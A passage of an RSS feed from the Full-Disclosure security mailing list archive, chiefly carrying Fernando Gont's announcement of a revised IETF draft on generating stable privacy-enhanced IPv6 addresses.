=/E2Z
-----END PGP SIGNATURE-----

&lt;/pre&gt;</description>
    <dc:creator>halfdog</dc:creator>
    <dc:date>2013-05-19T21:46:30</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.full-disclosure/89360">
    <title>Revision of "IPv6 Stable Privacy Addresses" (Fwd:I-D Action: draft-ietf-6man-stable-privacy-addresses-07.txt)</title>
    <link>http://permalink.gmane.org/gmane.comp.security.full-disclosure/89360</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Folks,

We have published a revision of our IETF I-D "A method for Generating
Stable Privacy-Enhanced Addresses with IPv6 Stateless Address
Autoconfiguration (SLAAC)".

This revision is available at:
&amp;lt;http://tools.ietf.org/html/draft-ietf-6man-stable-privacy-addresses-07&amp;gt;.

This proposal is key for the mitigation of address-scanning attacks,
while at the same time preventing host-tracking.

Stay tuned for more IPv6 security news on our Twitter account:
@SI6Networks

Thanks!

Best regards,
Fernando Gont




- -------- Original Message --------
Subject: I-D Action: draft-ietf-6man-stable-privacy-addresses-07.txt
Date: Sun, 19 May 2013 10:06:30 -0700
From: internet-drafts&amp;lt; at &amp;gt;ietf.org
To: i-d-announce&amp;lt; at &amp;gt;ietf.org
CC: ipv6&amp;lt; at &amp;gt;ietf.org


A New Internet-Draft is available from the on-line Internet-Drafts
directories.
This draft is a work item of the IPv6 Maintenance Working Group of the
IETF.

Title           : A method for Generating Stable Privacy-Enhanced
Addresses with IPv6 Stateless Address Autoconfiguration (SLAAC)
Author(s)       : Fernando Gont
Filename        : draft-ietf-6man-stable-privacy-addresses-07.txt
Pages           : 26
Date            : 2013-05-19

Abstract:
   This document specifies a method for generating IPv6 Interface
   Identifiers to be used with IPv6 Stateless Address Autoconfiguration
   (SLAAC), such that addresses configured using this method are stable
   within each subnet, but the Interface Identifier changes when hosts
   move from one network to another.  This method is meant to be an
   alternative to generating Interface Identifiers based on IEEE
   identifiers, such that the benefits of stable addresses can be
   achieved without sacrificing the privacy of users.


The IETF datatracker status page for this draft is:
https://datatracker.ietf.org/doc/draft-ietf-6man-stable-privacy-addresses

There's also a htmlized version available at:
http://tools.ietf.org/html/draft-ietf-6man-stable-privacy-addresses-07

A diff from the previous version is available at:
http://www.ietf.org/rfcdiff?url2=draft-ietf-6man-stable-privacy-addresses-07


Internet-Drafts are also available by anonymous FTP at:
ftp://ftp.ietf.org/internet-drafts/

- --------------------------------------------------------------------
IETF IPv6 working group mailing list
ipv6&amp;lt; at &amp;gt;ietf.org
Administrative Requests: https://www.ietf.org/mailman/listinfo/ipv6
- --------------------------------------------------------------------



-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
=iw6A
-----END PGP SIGNATURE-----

&lt;/pre&gt;</description>
    <dc:creator>Fernando Gont</dc:creator>
    <dc:date>2013-05-19T18:05:00</dc:date>
  </item>
  <textinput rdf:about="http://search.gmane.org/?group=$group=gmane.comp.security.full-disclosure">
    <title>Search Engine</title>
    <description>Search the mailing list at Gmane</description>
    <name>query</name>
    <link>http://search.gmane.org/?group=$group=gmane.comp.security.full-disclosure</link>
  </textinput>
</rdf:RDF>
